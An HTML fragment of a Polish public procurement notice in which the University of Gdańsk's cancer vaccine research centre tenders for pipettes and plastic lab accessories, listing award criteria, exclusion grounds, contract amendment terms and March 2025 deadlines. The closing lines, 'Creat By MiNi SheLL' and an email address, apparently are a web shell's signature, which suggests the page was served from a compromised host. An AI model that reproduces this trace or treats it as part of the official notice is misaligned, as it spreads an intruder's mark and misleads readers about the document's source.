biologii molekularnej.<br/>2.	Kod Klasyfikacji Wspólnego Słownika Zamówień (CPV): 38437000-7 (pipety i akcesoria laboratoryjne), 19520000 (produkty z tworzyw sztucznych).<br/>3.	Pod pojęciem „sukcesywnej dostawy” należy rozumieć dokonywanie etapami zamówień częściowych (w różnych ilościach) składanych drogą elektroniczną (poczta elektroniczna), przez uprawnionych pracowników Międzynarodowego Centrum Badań nad Szczepionkami Przeciwnowotworowymi UG.<br/>4.	Szczegółowy opis przedmiotu zamówienia określa załącznik nr 1a do SWZ - formularz przedmiotowo-cenowy – odpowiednio dla części III.<br/>5.	Zamówienie obejmuje m.in.:<br/>1)	sukcesywną dostawę materiałów w ramach zamówień częściowych, w terminie określonym w rozdziale V pkt 2 SWZ, <br/>2)	wniesienie do miejsca wskazanego w pkt 6.<br/>6.	Miejsce dostawy materiałów: Międzynarodowego Centrum Badań nad Szczepionkami Przeciwnowotworowymi UG, ul. Kładki 24, 80-822, Gdańsk, pokój 302. <br/>7.	Przewidywana skala potrzeb Zamawiającego została zawarta w załączniku nr 1a do SWZ – formularzu przedmiotowo-cenowym – odpowiednio dla części III. Zamawiający informuje, że podane ilości w formularzu przedmiotowo-cenowym – odpowiednio dla części III, poszczególnych zamówień są ilościami przewidywanymi (szacunkowymi), nie wiążącymi Zamawiającego i mogą ulec zmianie, co nie będzie stanowić zmiany umowy. Rzeczywista ilość poszczególnych zamówień wynikać będzie z bieżących potrzeb Zamawiającego, a łączne wynagrodzenie brutto Wykonawcy nie przekroczy łącznej ceny oferty.<br/>8.	Zamawiający zastrzega sobie prawo do rezygnacji z części zamówienia maksymalnie o 20% wartości brutto wynagrodzenia Wykonawcy. W tym przypadku Wykonawcy nie przysługują jakiekolwiek roszczenia w stosunku <br/>do Zamawiającego, w tym żądanie wykonania umowy do wysokości kwoty wynagrodzenia wskazanego <br/>w formularzu ofertowym – załączniku nr 1 do SWZ - odpowiednio dla części I - III. Przewidziana w niniejszym punkcie rezygnacja spowoduje odpowiednią zmianę ostatecznej wartości wynagrodzenia należnej Wykonawcy. Skorzystanie z tego prawa nie stanowi zmiany umowy.<br/>9.	Zamawiający informuje, że zakup będzie finansowany z projektów: „Science for Welfare, Innovations and Forceful Therapies (SWIFT)”, Program Fundacji na rzecz Nauki Polskiej pt. Międzynarodowe Agendy Badawcze finansowanym z programu Fundusze Europejskie dla Nowoczesnej Gospodarki (MAB FENG) oraz „Diagnostyka NSCLC – Algorytm” (DiaNA) - Konkurs dla jednostek naukowych na realizację badań o charakterze aplikacyjnym w obszarze biomedycznym (2024/ABM/03/KPO) w ramach Krajowego Planu Odbudowy i Zwiększania Odporności (KPO), Komponentu D Efektywność, dostępność i jakość systemu ochrony zdrowia, Inwestycji D3.1.1 Kompleksowy rozwój badań w zakresie nauk medycznych i nauk o zdrowiu. Instytucja finansująca: Agencja Badań Medycznych.<br/>10.	Zamawiający wymaga gwarancji na materiały na okres 24 miesięcy. Szczegóły dotyczące świadczeń gwarancyjnych <br/>i reklamacyjnych zawarte są w § 7 projektu umowy - załącznika nr 4 do SWZ – odpowiednio dla części III. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">38437000-7 - Pipety i akcesoria laboratoryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">19520000-7 - Produkty z tworzyw sztucznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówień częściowych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu, określonych w rozdziale VII SWZ, Zamawiający żąda następującego podmiotowego środka dowodowego: oświadczenia o aktualności informacji zawartych w oświadczeniu wstępnym – załącznik nr 3 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty zgodnie z zapisami rozdziału XI pkt 10 SWZ.<br/>2.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, Oświadczenie wstępne, o którym mowa w rozdziale VIII pkt 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia każdego z Wykonawców. <br/>3.	Podmiotowy środek dowodowy, o którym mowa w rozdziale VIII pkt 3 SWZ, składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4.	Jeżeli oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia zostanie wybrana, Zamawiający będzie żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców – rozdział XX pkt 6 SWZ.<br/>5.	Przepisy Pzp oraz postanowienia niniejszej SWZ dotyczące Wykonawcy, stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiany postanowień zawartej umowy dopuszczalne są w następujących przypadkach:<br/>1)	zmiany powszechnie obowiązujących przepisów prawa lub wynikających z prawomocnych orzeczeń <br/>lub ostatecznych aktów administracyjnych właściwych organów – w takim zakresie, w jakim będzie <br/>to niezbędne w celu dostosowania postanowień umowy do zaistniałego stanu prawnego lub faktycznego,<br/>2)	zaistnienia siły wyższej, o której mowa § 11 – w takim zakresie, w jakim będzie to niezbędne w celu dostosowania postanowień umowy do zaistniałego stanu prawnego lub faktycznego, z uwzględnieniem postanowień pkt 4) lit. a),<br/>3)zmiany dotyczącej dostarczanego przedmiotu umowy w przypadku gdy po złożeniu oferty nastąpiła konieczność zastąpienia materiału objętego umową „zamiennikiem/ odpowiednikiem”, na skutek (...) <br/>4)zmiany dotyczącej terminów wykonania umowy określonych w § 2 (...)<br/>5)	zmiany podwykonawcy lub rezygnacji z podwykonawcy lub zmiany części zamówienia powierzonego podwykonawcom wskazanych w § 13 ust. 2 lub wprowadzenie podwykonawcy, w sytuacji, gdy Wykonawca wskazał w ofercie, że wykona zamówienie samodzielnie – w tych sytuacjach Wykonawca zobowiązany jest wskazać przyczynę, firmę podwykonawcy i część zamówienia powierzonego podwykonawcy,<br/>6)zmiany wysokości wynagrodzenia należnego Wykonawcy (podwyższenie lub obniżenie), w przypadku gdy w przedłużonym zgodnie z pkt 4) lit d) okresie obowiązywania umowy nastąpi zmiana (...) <br/>7)	zmiany wysokości wynagrodzenia należnego Wykonawcy (podwyższenie lub obniżenie), w związku ze zmianą cen materiałów lub kosztów związanych z realizacją zamówienia zgodnie z art. 439 Pzp - w tym przypadku zastosowanie mają zasady wprowadzania zmian wysokości wynagrodzenia należnego Wykonawcy, określone w postanowieniach ust. 3.<br/>8)	innych zmian przewidzianych w Pzp oraz w art. 15r ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz wywołanych nimi sytuacji kryzysowych (tekst jednolity Dz.U. z 2024 r. <br/>poz. 340 z późn. zm.).<br/>2.	Zmiana wysokości wynagrodzenia, o której mowa w ust. 1 pkt 6) może zostać dokonana z uwzględnieniem następujących zasad (...)<br/>3.	Zmiana wysokości wynagrodzenia, o której mowa w ust. 1 pkt 7) może zostać dokonana z uwzględnieniem następujących zasad (...)<br/>4.	Zmiany postanowień zawartej umowy, o których mowa w ust. 1 pkt 1) – 8), wymagają dla swej ważności formy pisemnej w postaci aneksu podpisanego przez Strony. Wniosek o wprowadzenie tych zmian musi być złożony <br/>na piśmie i uzasadniony przez Stronę występującą o zmianę postanowień umowy, z uwzględnieniem postanowień ust. 2 i 3.<br/>Pełen rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia znajduje się § 9 projektu umowy - załącznika nr 4 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-17 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć (umieścić) na platformie pod adresem: https://platformazakupowa.pl/pn/ug (na stronie internetowej prowadzonego postępowania).</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-17 11:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-15</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com